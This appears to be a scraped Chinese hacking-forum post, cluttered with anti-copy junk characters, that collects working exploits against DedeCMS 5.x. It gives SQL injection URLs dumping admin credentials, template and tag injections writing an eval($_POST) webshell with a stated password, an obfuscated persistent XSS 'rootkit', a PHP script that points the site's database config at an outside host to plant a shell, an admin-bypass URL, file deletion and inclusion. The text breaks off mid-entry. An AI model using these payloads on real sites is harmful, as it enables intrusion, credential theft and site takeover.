|
, H X6 f& k% w6 h
Dedecms 5.6 rss注入漏洞: p5 f: P0 C9 W8 I8 Z% V- Z
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1: A- k# H/ \. @: N' q
. ]' }3 i" R9 h: m7 A6 f6 e5 @& s' t% r
* a# `3 I" \1 J% m" J! h
5 B2 Q+ U8 Y5 b9 `! w
x/ h& d) s) u' [" ~- U; L) f% I1 Q) i1 v6 G9 C3 f' M" L
! I/ I, @8 |2 Q. n8 V
% i# n; c5 _' T) k! M7 mDedeCms v5.6 嵌入恶意代码执行漏洞8 C# H* S4 V' D7 Y+ k' G. E' }
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}1 |) W9 B) r3 F
发表后查看或修改即可执行
' C4 }- _" h: o9 _1 w aa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}6 r T/ H- h% B7 G
生成x.php 密码xiao,直接生成一句话。
- g9 d) T- y2 U, i1 @+ O: z0 o7 e. w2 m! Z3 E* m. R1 a: R
/ f7 D2 i) n/ g
9 m5 C& l. d# Q) u
4 Q C- W2 @1 a0 Q# g2 R8 c
3 z" T& T, g2 _0 Q2 }5 z1 T! g. k7 |( k
3 K: y. Y' a5 K$ H
$ w8 B! o% A' L, x3 Q% fDede 5.6 GBK SQL注入漏洞. a7 p+ C7 J& N5 [# |" p3 k! {
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
0 n9 x0 U. j8 a4 l8 Khttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe- |, O% c; ^; a" |
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7' c. ^* r& d# l, u1 c
/ i* j* Z& l- q! I- q+ d" i0 W+ X7 g& K# V
2 Q/ h: }& V7 e) _; T( e$ I
5 U& p7 ^) _8 u1 ?: k! n
2 r) K2 K3 ^: s7 |& V, K9 |* z( M! M6 \5 e; f8 R
. |' d( b+ A; _8 O* a: w: W
( V1 l3 R" \' Z' W, j1 L, ADedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
& f( G5 Z7 Y7 j2 @* @/ E8 l. @http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` R" k! B6 k& E% v6 D ~- s0 p! N
% k2 {# c2 e) g0 s0 w; |' S) n8 V, n+ B
( k) Q' n3 P3 f& i0 A# r
" V5 u( f' ?6 M# I4 R8 w1 E& x% l0 y
6 o" X) o, h5 ], \" F6 d6 r
DEDECMS 全版本 gotopage变量XSS漏洞
" l9 r& B8 k6 k* y' n; ~6 B6 f1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ) E" B4 {5 e$ r7 X8 {6 j1 @ j
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
5 O; h( T6 U9 x" t! _* r2 @- ^* P
5 ^6 |- i) q6 b
$ R$ M7 y' Q, n, L6 B2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 ; h" k$ Q& n8 G# b
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda" P Z# m; {" l9 G& U* E
; ?& j7 x; c# F6 \- k
2 M& \" {$ l( w/ p
http://v57.demo.dedecms.com/dede/login.php
) `3 S3 A2 v% a- r C0 }) |8 |" E6 a: d; ~7 R( J R9 A
2 d5 D% {. S$ O, d6 W! T- mcolor=Red]DeDeCMS(织梦)变量覆盖getshell
. i( {! ]: F# Q6 O: y9 n3 h; N2 j#!usr/bin/php -w, N, o X" X, y6 i$ [4 Y1 T- t
<?php' L! i6 |2 ^, _! M9 g; ~
error_reporting(E_ERROR);* `# H {: p# N! w+ ~
set_time_limit(0);
- b7 Y! A9 [$ G6 u0 O. ~' _print_r('
: m9 V/ t: c9 \( w& j$ {DEDEcms Variable Coverage
. o& g; l# p: @) ?Exploit Author: www.heixiaozi.comwww.webvul.com
- c) d e6 u/ J0 \2 t: V);3 m3 I. `' e( t" k
echo "\r\n";
+ G$ O5 i4 \- xif($argv[2]==null){- D0 o# D) x0 r" p
print_r('
; l% ?, q, X N+ q/ x3 t+---------------------------------------------------------------------------+* d( @& m, m3 y1 c9 Z/ W. U; z: x- s+ R* L( [
Usage: php '.$argv[0].' url aid path
$ p d( d8 H' {( G( E+ o# Uaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
' g0 Z3 |8 u" t1 q7 AExample:) E& \" [ p: A4 v) l1 \2 |: m. T
php '.$argv[0].' www.site.com 1 old
7 A7 I- x' I3 ^+ N. b a" Z7 O t+---------------------------------------------------------------------------+
9 K5 i) y0 ~7 E! a* l" ?');
' x( Y) p' t, Hexit;
3 V5 K7 `, e6 O% n, W0 ^& m}1 c7 e, @4 h( W! g( u7 T9 X
$url=$argv[1];
% @* T+ y; J R' n) Y$aid=$argv[2];
" Y) d( z1 [3 e4 W$path=$argv[3];
4 ^* m( U H. \6 G* Y$exp=Getshell($url,$aid,$path);: J- k7 U% r* A; |9 W3 ?
if (strpos($exp,"OK")>12){
0 a$ ]3 h* |% q# w8 Hecho "1 F4 O4 X0 |% X! `6 m1 a, h, W
Exploit Success \n";3 M3 {% A0 L W% K* b) n
if($aid==1)echo "
; z7 L6 N' K8 B: R/ ]4 V# X0 s7 tShell:".$url."/$path/data/cache/fuck.php\n" ;9 K. ^9 C9 v1 t3 D4 _. c4 b S
8 d4 t! b- \4 w/ m. ~- ?
7 v K: Y* X0 j3 P2 G# xif($aid==2)echo "
X, F. [2 @) r3 s# YShell:".$url."/$path/fuck.php\n" ;1 o. J" ?0 U$ P- i5 ^
# J% d8 F5 K- c3 U; v) V) d
; _& x2 }+ T$ h/ }1 N; O& hif($aid==3)echo "% t) H2 Y' M: U
Shell:".$url."/$path/plus/fuck.php\n";& b0 i: ^' ^. X& Q
% G4 q: p3 S" k! [
/ ]6 ?* v( q& p- C}else{+ Z6 U+ O/ `+ H6 ~/ `8 q
echo "# L( w5 l. |1 A7 T9 R
Exploit Failed \n";
+ ~8 r- p; H% _$ j4 H}
x# e0 @& Z0 j/ Q# Z% {function Getshell($url,$aid,$path){% t% Y0 G$ A3 @' W
$id=$aid;
) L! z1 J1 {; b7 t& y1 Q/ f7 G$host=$url;
) X6 [" P# q/ x& J! T0 h' ~$port="80";+ s+ W9 M9 B5 n
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";% a: N3 n; O3 c# d
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";# Q2 l, X* i8 i
$data .= "Host: ".$host."\r\n";
$ A' _) z: U& C$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";2 l" d: Z. R: ~# n6 W# f1 x3 A
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
2 g: y$ @5 n! W$ ?$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
+ R2 ^. z, I0 m//$data .= "Accept-Encoding: gzip,deflate\r\n";
: H( j& T0 A2 b, b) p* x$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
7 W) F* U. U: P% q0 S+ J$data .= "Connection: keep-alive\r\n";
7 Q# O* N7 p" L! w$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
( w8 N( F% _8 n9 @$data .= "Content-Length: ".strlen($content)."\r\n\r\n";% s: s2 }8 F+ J7 B) l6 m
$data .= $content."\r\n";
* K+ y$ p! d7 l2 i$ock=fsockopen($host,$port);3 y' B0 R" S/ |7 S |, K3 Y
if (!$ock) {: A2 m2 v$ j; r7 I% }7 K- J
echo "4 \) k: Z& D' p9 K( ~0 C6 @% `8 Z9 n
No response from ".$host."\n";
9 C- p7 ~. ~4 j. k6 j5 O}( M7 e# P, V/ Z
fwrite($ock,$data);
6 w$ m; u! @% |while (!feof($ock)) {5 x8 h" Z& Y |2 M: e
$exp=fgets($ock, 1024);
$ j* `# E! Z& a1 g) L4 H3 yreturn $exp;/ x: g( U7 `) x1 g- n
}4 I, l' G) m4 y4 a, C8 j' \. V
}. ]& B; F$ Y1 r: K1 V
' p2 L) a+ @: W( b* {, O
# q8 U0 B/ u% {% |( a?>7 S* L% |/ s% L; b4 a2 G* `
5 m/ h1 _- N, E" L; [; n9 X" r( E
. N2 R5 G/ e, e0 r* W% {) k R
! ] T% f- ?8 R8 w; A! p2 z" j) n# D
# I' j J. {5 W
- V: @. J; y+ Y, H# Z! X$ k/ m* e+ v6 T; r
' Z2 z9 ] s5 x8 B- b7 B
' M5 o- j$ g5 _8 \1 `: |+ u! [& z% p7 `, H; M& v, b- ?6 M1 }! A
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)3 z: @: a6 i% U- L2 }6 A+ S
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
% @0 c, E! g. B1 K5 [, g) ^8 C* [3 h* X- }/ l3 G1 O: {! n' h5 I h# s
( @1 d6 i1 _5 @* |/ Z, j
把上面validate=dcug改为当前的验证码,即可直接进入网站后台2 p; S- e1 j" @6 m, S1 H' i3 r) }% E
; ^ |" u+ a! M6 s$ J' ^
4 i1 z- \! j! f" S; o6 I8 G此漏洞的前提是必须得到后台路径才能实现
4 _) ]" H3 E. R8 x: V* w5 F
" J r l, y% s7 T+ D$ {' Y7 a% p- F7 K4 Y4 s" B; \/ B6 w
$ h2 G; R) L; i0 h8 T% h; y( V) L
p& e( y$ _$ ~: \5 V
- o4 ^9 V5 ~. O6 v% l, |! J* V. k3 f
* m; P6 F2 d; W F1 @* J+ W3 ]1 G
6 |, e' z/ S( @4 D/ g l: I( k% M* i# z$ |! l
' [8 `! i; ^- G3 c8 U# `Dedecms织梦 标签远程文件写入漏洞
2 G& s( t' l9 p2 [前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
) \& \6 m" W! }. O9 {$ D; `7 U
$ K$ {2 A$ \ n
/ d" O! {+ b/ f+ t0 J% b6 R再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
. ~# W0 u5 C0 g* Z+ X<form action="" method="post" name="QuickSearch" id="QuickSearch">- e( d4 i. v" l! J' w) R3 y
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
/ X& X9 P* z8 Y7 w6 ^& ]' I/ c9 W<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; ?* v' |7 B) K7 x5 T5 b<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
7 t( V5 n& K. B( G; s: O! k<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />3 h! [ j) e) ^5 x+ O
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
/ S- `- f5 Q l' A1 F' B; C<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
R: F4 r* M3 v$ r9 m% b<input type="text" value="true" name="nocache" style="width:400">
: ?) O6 a0 P' q9 M/ z t+ X* _<input type="submit" value="提交" name="QuickSearchBtn"><br />6 W. o0 n8 s; g* p& M
</form>
~: z! S* H$ k4 a$ R- R6 N<script>& L2 m8 l/ Q g7 U
function addaction()" A; I; x# z$ {2 O# A" \! d
{! f/ I8 D; P! l" Z. k- h
document.QuickSearch.action=document.QuickSearch.doaction.value;
2 Y0 y- s5 s* t2 B- m}
7 {8 B4 S! J0 o4 E% ^8 |$ Z7 X</script>
6 _) J4 t! @* L( l7 a3 n
5 `& h7 u* U+ w, [1 L. W
8 V3 y9 s% i( o! J' {4 n# c; n; V5 e
; {" c) k- a+ P( t
% R1 I8 r, B- }4 I j. b7 Y6 m! C* E
4 ?5 ~9 u6 c2 L8 A" I7 h! V
9 h4 c5 O, w) ]- {, [
$ @. |" c/ B5 T) `9 F- {7 @+ ~
* }/ R: A% x+ E* P/ L1 l
9 N% S' M5 Y5 O+ D. W3 C, [DedeCms v5.6 嵌入恶意代码执行漏洞" t8 [6 e$ m4 J& h9 t
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行) }6 d, J. y3 h: c
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}" a6 }. o# w, O, u
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
9 G, ]+ V2 p) M, D; }7 v* |Dedecms <= V5.6 Final模板执行漏洞# d+ T& Z; W+ V& r7 q2 `
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:2 q2 t$ S1 }- X
uploads/userup/2/12OMX04-15A.jpg+ u: _" M2 H0 V% r. G
; p3 U8 H+ e# g8 Z: M- y
|( A2 _+ S8 |9 y/ M5 u" q
模板内容是(如果限制图片格式,加gif89a):* ]: i* N, ~! Y/ }; ?
{dede:name runphp='yes'}
( y8 W. {4 @( L7 I8 {$fp = @fopen("1.php", 'a');& d6 a2 N+ U1 C9 \+ F
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");$ D, t9 B- l5 O6 h2 M
@fclose($fp);# q2 d' B Z4 u4 u+ a
{/dede:name}" ~& e; b8 @; _) u1 c
2 修改刚刚发表的文章,查看源文件,构造一个表单:: X8 K$ _% N0 @5 e; J$ w }
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data"># g0 H/ T5 @9 ^9 l
<input type="hidden" name="dopost" value="save" />8 K# `- A$ G6 w* ?/ S2 j3 I% p4 h. J
<input type="hidden" name="aid" value="2" />
: j) L# d3 |4 V M/ l<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />2 b/ g j+ |+ M& B( z! d0 L
<input type="hidden" name="channelid" value="1" />
5 j' p# u1 H4 S1 b9 s2 t<input type="hidden" name="oldlitpic" value="" />
- h( x! ~6 l, g* g<input type="hidden" name="sortrank" value="1275972263" />/ n5 \2 ]$ \, D' ^
K% Q. L7 U6 U" [5 E) z ~4 I5 E8 F. M/ u7 b# A
<div id="mainCp">
$ a4 t1 b2 `9 j# p<h3 class="meTitle"><strong>修改文章</strong></h3>* g8 u* f3 ?, r$ V0 l0 Y
+ s* P+ }! Z- z8 k7 `
7 I+ ~% `; D! N# `1 P- k. ~2 W
<div class="postForm">
1 c& d2 f" ^0 c/ n<label>标题:</label>
' v: b/ S4 i) B6 O" c8 d% H& u<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>% f" \' h: c3 ~% B( z
6 b( M7 ?5 j3 s {+ j( J
# D3 S; D7 J6 h B2 ?<label>标签TAG:</label>- @' J6 [, y/ X. }
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)" [. d2 v6 E, v: Y( @( t, i6 r
$ U$ G* h6 m! v. i
/ q; t8 Z- F6 g) l+ v<label>作者:</label>+ Z& o F8 g" ?- K5 C4 [$ {
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
0 P# t; w0 Y1 F( Z% {! O3 x
H f' a. O" T7 ^. M+ ~& j' l3 o, y8 r. t
<label>隶属栏目:</label>% D9 U i/ z3 v8 {+ W4 j
<select name='typeid' size='1'>" k, T8 u: O- z3 W5 c
<option value='1' class='option3' selected=''>测试栏目</option>( Y* F$ T8 b y* q1 }5 [
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类). Z+ l4 |1 b4 H/ d
* y( c1 @+ o* ~" E
' ~! h, l! \1 w% X* G. G<label>我的分类:</label>
6 a' h8 V7 C( }9 q5 f5 `<select name='mtypesid' size='1'>
) u( R ~7 G9 o h a' t<option value='0' selected>请选择分类...</option>2 G* w; [* n$ A) n4 V
<option value='1' class='option3' selected>hahahha</option>4 c( b; g% g1 f9 I+ p& o
</select>6 ~8 C8 x4 X) M
2 W2 T2 s* t5 L( ]& W
! \: V8 |' t3 f' ]' @<label>信息摘要:</label>
5 A7 D- Q# }1 `8 W$ v; h9 d6 S9 i<textarea name="description" id="description">1111111</textarea>* t) o; Y. p4 h
(内容的简要说明)
z( H& c0 t6 V6 B& a8 L U. b' D w* n: B) Z
i: _# A9 B7 z' D3 o6 T6 I) M<label>缩略图:</label>
! o$ W6 v4 Q4 g$ N: C<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) h8 S) ?3 V- t& \5 r) c2 a
% k _' c7 W7 ?9 D% c1 ^4 [5 d8 |2 ^* M! W% w- X' h, V9 e1 Y
<input type='text' name='templet'
. ]) Z1 k6 ]4 w0 y% p& B4 f0 Ovalue="../ uploads/userup/2/12OMX04-15A.jpg">
! k& q( Q' J- p1 m0 E- K<input type='text' name='dede_addonfields'3 b; Q9 g6 v0 I6 ?7 X
value="templet,htmltext;">(这里构造)" b0 x: ]. P2 ~% y
</div>
/ b5 u0 K( r: G4 X* z& C& Q0 P& G v' x
9 L \+ z; Z5 z" \<!-- 表单操作区域 -->/ X& T6 w2 @5 M+ g
<h3 class="meTitle">详细内容</h3>' e3 O* H% T- C% {6 P# p
b! \: ~( i& [- o, {. }: |
* Q: |) n$ @) z
<div class="contentShow postForm">' H( C+ \/ B# o0 T6 j: J
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
1 h1 s9 G3 ]' k3 L3 t( g0 V
! x! s3 o$ V- T, r$ [- e
9 a6 b0 U5 v# B2 s0 l' y$ ^) Z<label>验证码:</label>
9 e6 F3 o* g+ ~2 Y<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
" o7 h# w0 v. c9 T. R' L<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />6 X' {5 S F' p- l, r9 W }6 T
* R! }% C% G' b8 j1 {! w7 o/ v9 J
% U3 b( l4 m8 f8 J% }<button class="button2" type="submit">提交</button>- \8 ?8 U1 [ o9 L0 R$ u6 e
<button class="button2 ml10" type="reset">重置</button>
- t& X. Q$ @' q5 {* Q</div>4 E6 x# ]# X; k8 _7 t) f3 {% |3 W
- W0 A& S D5 a/ _8 \# T$ ?) B! J! Z5 I, j7 m3 {
</div>% `$ s8 W _; Z0 U! O( Z+ R' ~$ {
. J) b7 e2 j* ^* A8 Q. x/ M3 u- F; O0 J
</form>
) B' g4 a: Y( C0 Y% v$ v( I3 q8 [8 h( {) l3 j
) c; m1 [) y1 y提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
O. J. P# [8 v* o! \& @假设刚刚修改的文章的aid为2,则我们只需要访问:8 ]" N$ \" Q; A
http://127.0.0.1/dede/plus/view.php?aid=2) e, Y; w$ a5 ^2 C2 s3 n& i
即可以在plus目录下生成webshell:1.php
3 \% P) k2 F" A# x( H" }
8 ]' p9 E/ m, w$ {# f. C* B) d! E7 V3 ~
" ^1 A7 c7 m" u9 O$ l% U) a. s
: J4 [( O$ A8 }1 b9 s |1 |2 G, f" l! k! j X' b: ]& c
3 J$ O- n- r# V0 I2 z u0 ~* O7 g
, f; p* M# ~% J5 V# `9 n
: z+ Z6 S; B0 y* [& Y5 l& K" j3 o2 B0 K$ }6 `
8 o+ t4 j' l/ x, H* _6 } `
* Q1 q1 r' q& s
' t% p# D, n: h" b8 RDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
Q+ n( U8 b# S, l. |3 I9 E2 Z8 JGif89a{dede:field name='toby57' runphp='yes'}
4 Y& T, x( E+ O+ @phpinfo();
- f1 [8 D2 Z( a8 B: m{/dede:field}
! [" P) u/ d( X5 l, g保存为1.gif
, u+ n) W# S" n4 U<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
0 _" r" W0 c+ d! d1 W+ M<input type="hidden" name="aid" value="7" /> : s# B. Z p! _, M( E
<input type="hidden" name="mediatype" value="1" /> ; O1 M4 y7 U' i# R( {
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ! H9 l: }1 H+ ~* n. N
<input type="hidden" name="dopost" value="save" />
+ U; A3 Z( v7 `+ ^1 E<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> & P9 n: K7 f* I
<input name="addonfile" type="file" id="addonfile"/>
G: ]1 M: w2 K/ \<button class="button2" type="submit" >更改</button>
7 |9 X% _+ e1 c$ w' A0 H</form>
s2 Q T" ?5 r& c; E: z# m$ E; X' z
+ L# V/ p* U* a0 w" ]构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
, ^, k# d# I/ g/ K2 K; g% \发表文章,然后构造修改表单如下:3 c. x& p% Q8 q& ^& }, h3 u4 Z1 X
& \* O( X$ k( x$ K
( f" B+ P9 y* U( b* r<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
. L+ d" M5 H3 J<input type="hidden" name="dopost" value="save" /> 3 D4 _& G/ c9 w! O5 B1 G
<input type="hidden" name="aid" value="2" />
Z0 b# x' T" k! X; [<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
! \! M- u3 t: B/ A6 e<input type="hidden" name="channelid" value="1" /> $ l2 X$ Y ~9 @; s* R3 R5 A! _
<input type="hidden" name="oldlitpic" value="" /> ; d, x5 _9 c2 r- Z
<input type="hidden" name="sortrank" value="1282049150" /> 1 L+ X: @/ G0 A9 ?& ~8 F4 z
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
' W1 E- G6 y6 C3 o3 }; E/ H<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
$ {" ?* r8 `) N' e0 m<select name='typeid' size='1'> : T! u2 x" X0 t/ A+ F0 d
<option value='1' class='option3' selected=''>Test</option> ) i7 g$ a" W. {* s! D6 t
<select name='mtypesid' size='1'>
! ]) y# G4 `; b' i) W: V7 x: Y<option value='0' selected>请选择分类...</option> % Q* R- R# n6 V0 |
<option value='1' class='option3' selected>aa</option></select>
( ~1 q6 i' n+ J N4 e<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
- x$ N3 \. n' [<input type='hidden' name='dede_addonfields' value="templet"> : V: B0 T( I0 [; X
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 5 d A( O% V: B. w" W; n- X
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
& [8 J9 x6 y/ O; h<button class="button2" type="submit">提交</button> ( {: z: K) x/ X8 v
</form>3 O" Y e' G2 a, c/ ] X
" j+ H& s2 P6 r
) u( |0 R* T- Q1 S3 P" Y" ~/ X6 X4 ^. j2 W
9 S# L5 { j: ]2 l% A# O
: Q! I6 e% j3 k
# Y( U9 Q# ?* K& K1 h' @' Y$ u( h
! `; n2 C" h$ j! [, h! _
" q: e0 A- i( h7 _0 Y4 s
4 k: w* I4 I; @+ d# [3 q
8 ^( H9 D8 e. H. e4 y$ ?; {# z
7 C9 b }) {3 l J0 }2 q
/ q( e/ ^8 w" F$ d2 I; y织梦(Dedecms)V5.6 远程文件删除漏洞" {5 \" m% |. t7 K
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
Q* a+ G( I/ Y) `% ]1 e
& H( e; Z, R! @0 F- D, H5 `! {% c8 s% L* `/ u8 ?. v8 z
. M8 J" w2 s' F/ w2 {4 Z$ h! {, s% l. {. E7 ?& A
. {8 f4 n2 f4 r! Z3 w8 V& a7 t7 Z
4 J8 x+ h+ B+ q3 k
6 S, `$ c# `% q7 [) W) x/ k
& h2 H, F: A7 I
/ D; R) t h3 z8 C. s" v+ J* N; F
$ K5 Y" b* C, r0 r织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
/ E! C1 W4 G+ A+ a" K* y( Mhttp://www.test.com/plus/carbuya ... urn&code=../../( g v; H3 a( x- O4 N" ?
$ W- b( v. z3 E' y' ~$ O: k! x. H6 P J
4 a/ Z7 M. R+ E$ G4 `
6 U) p f7 Z- r' E2 t5 p: J8 [ j7 N& r5 ~! G# G
}7 }6 d1 M% @: T. ]+ m
) Y3 x: R! E1 b, l9 O: M2 c
& p1 y( B4 M% R3 O$ C9 d" s' `$ l! X3 }) T
( T. O1 P5 M4 \7 ]/ R/ j
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 , Q- z7 e$ w. c6 `# k! C2 }
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
* R' N& T2 i) B密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
% R7 c( [& w) w- y- B
+ E' f8 X7 o$ i
7 ~7 M1 k: p+ p9 e# Q& c4 z3 i/ t/ P1 {% I2 y# E6 v4 ?
! r" `, S! b- B: v ?1 d& ^& B
7 t# z# \& L) ?- L: O
0 q# T5 W% ~: }* ^% ?
& g7 [5 @ o3 r+ v- ]0 x6 F, u; I$ f2 v- q+ d, S: b7 E! i
7 v, C2 ]5 P7 \0 g3 t# n
" Q* X, H- e3 u. L织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
6 ^* ~+ V; |3 thttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='* n2 n- e6 G+ V0 M/ K/ a4 ~
9 b6 p. B( ]* a) \; P# N+ C1 p! a
4 D3 V1 ~- {2 i% l5 F+ u4 T8 I* c8 ~* ]: l @7 m a. c9 Z
% {) H4 ?: r0 D5 s0 j8 h& B3 x; X5 c1 i% N; D4 T1 a, L \
, a1 X( b" s& j( |
$ D: H. R0 r6 c3 Z2 u9 P1 Q' o4 k) C# N# ]" \4 f3 T
+ H7 l5 j+ p @' ?
2 Q. z0 a9 R4 U
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞1 T% k$ v9 @. L: ~2 v
<html>' ?# s7 C* _1 {. m$ p6 {6 u5 }
<head>
